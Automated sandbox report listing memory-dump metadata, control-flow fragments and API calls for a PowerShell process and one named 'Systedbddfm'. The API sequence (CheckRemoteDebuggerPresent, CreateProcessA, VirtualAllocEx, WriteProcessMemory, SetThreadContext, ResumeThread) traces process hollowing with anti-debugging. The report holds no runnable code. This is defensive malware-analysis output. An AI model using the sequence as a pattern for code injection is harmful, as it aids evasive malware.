                                                                                                                                                                                                                                                                                                                                                        • String ID: `oDk$`oDk$`oDk$`oDk
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3378734023
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: DK4l$Xc4l$lj$lj
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: =Fj^$Fj^$Fj^$Fj^
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.626471703.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: DK4l$Xc4l$lj$lj
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: 3Fj^$CFj^$SFj^$cFj^
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.627763086.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2d80000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID: 3Fj^$CFj^$SFj^$cFj^
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:18.4%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:4.5%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:67
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1379 ee29f8-ee2a96 CheckRemoteDebuggerPresent 1382 ee2a9f-ee2ae3 1379->1382 1383 ee2a98-ee2a9e 1379->1383 1383->1382
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 149167054e4deb95d28ff9ce8f1a7192aa8f0fc0462c3500c5f2f856b116b0fc
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f52489cfb3bcebb73e064b50f1ee21453a35469283a30a7b0c3f5f5b365ef845
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E31A8B4D052589FCB10CFAAD984ADEFBF5BB49314F10942AE919B7200C774A946CF94
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502B5B7
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 91943f229af520720a7532034bcd90910ec34f818d5853c1b91f7fa2a9ca0376
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d950e336e93bbe9038942d84ad5cd7f4c8ea1a876a25883fc4be1015714da7
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61C12571D0422D8FDB20CFA4D984BEEBBB1BF49304F0091A9D949B7240DB749A85CF95
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1313 502aed8-502af43 1315 502af45-502af57 1313->1315 1316 502af5a-502afbb WriteProcessMemory 1313->1316 1315->1316 1318 502afc4-502b016 1316->1318 1319 502afbd-502afc3 1316->1319 1319->1318
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502AFAB
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f9a56c949e107a6404a623c224dd090011766a206798a5c1b59123917546d6a
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33c471709c1850e253f22103132f327c4beb35bc08245958dff98018e8386ce0
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0141A9B5D052589FCF00CFA9D984AEEFBF1BB49314F14902AE819B7200D778AA45CF64
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1324 502ad88-502ae42 VirtualAllocEx 1327 502ae44-502ae4a 1324->1327 1328 502ae4b-502ae95 1324->1328 1327->1328
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502AE32
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1333 502aba0-502ac00 1335 502ac02-502ac14 1333->1335 1336 502ac17-502ac5f SetThreadContext 1333->1336 1335->1336 1338 502ac61-502ac67 1336->1338 1339 502ac68-502acb4 1336->1339 1338->1339
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 0502AC4F
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ContextThread
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591575202-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1344 ee2dc0-ee2e1b 1346 ee2e1d 1344->1346 1347 ee2e28-ee2e71 EnumWindows 1344->1347 1348 ee2e25 1346->1348 1350 ee2e7a-ee2ec6 1347->1350 1351 ee2e73-ee2e79 1347->1351 1348->1347 1351->1350
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: EnumWindows
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1129996299-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1357 ee2dc8-ee2e1b 1359 ee2e1d 1357->1359 1360 ee2e28-ee2e71 EnumWindows 1357->1360 1361 ee2e25 1359->1361 1363 ee2e7a-ee2ec6 1360->1363 1364 ee2e73-ee2e79 1360->1364 1361->1360 1364->1363
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: EnumWindows
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1129996299-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1370 ee29f3-ee2a96 CheckRemoteDebuggerPresent 1373 ee2a9f-ee2ae3 1370->1373 1374 ee2a98-ee2a9e 1370->1374 1374->1373
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EE2A86
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3662101638-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph (figure omitted): nodes 1388 (502aa80-502ab0e, ResumeThread), 1391 (502ab10-502ab16), 1392 (502ab17-502ab59); edges 1388->1391, 1388->1392, 1391->1392
                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0502AAFE
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.715359156.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_5020000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00EE2B76
                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.700661261.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_d0d000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c941c743422fc82b315ed16e4a0dd8ab57a33e6fad1e86a3a73f536fecd0a928
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad28790b5a283c3e19dbb5bfe67cf23799ab2597a96ab0f28b3f315f9a6488d6
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E610FB0E042988FDB14CFA9D884BDEBBF5BB49318F10912AE515BB291DB749846CF44
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3fba785893b0db4f6140c9e3f51ead00e99cf5b394dc971c322eae3ddaed9c4b
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c5d62829af56e0d72018b07a82de6e04f0b292b92ad0a8bf024b597b433551e
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E5120B0E0025C8FDB14CFA9D884B9EBBB5FB49308F109129E915BB390DBB49845CF85
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 48c043bf6604d069aff312cc7677b4425501003b3bc7e88dd0e23f62bf299cff
                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95fe9ab79f126ff59594f111166e0f89d4f75571b0a88f8609d6875c748feabf
                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351EEB0D0025C8FDB24CFA9D985BEEFBB5BB49308F20912AD515BB250DBB45846CF45
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000011.00000002.701791049.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_ee0000_Systedbddfm.jbxd
                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:10
                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                                                                                        execution_graph 31874 7a6bda8 31880 7a6b65c 31874->31880 31876 7a6bddd 31878 7a6bea4 CreateFileW 31879 7a6bee1 31878->31879 31881 7a6be50 CreateFileW 31880->31881 31883 7a6bdc7 31881->31883 31883->31876 31883->31878 31884 7a602b8 31885 7a602fe GetFileAttributesW 31884->31885 31887 7a60337 31885->31887

                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                        • Not Executed
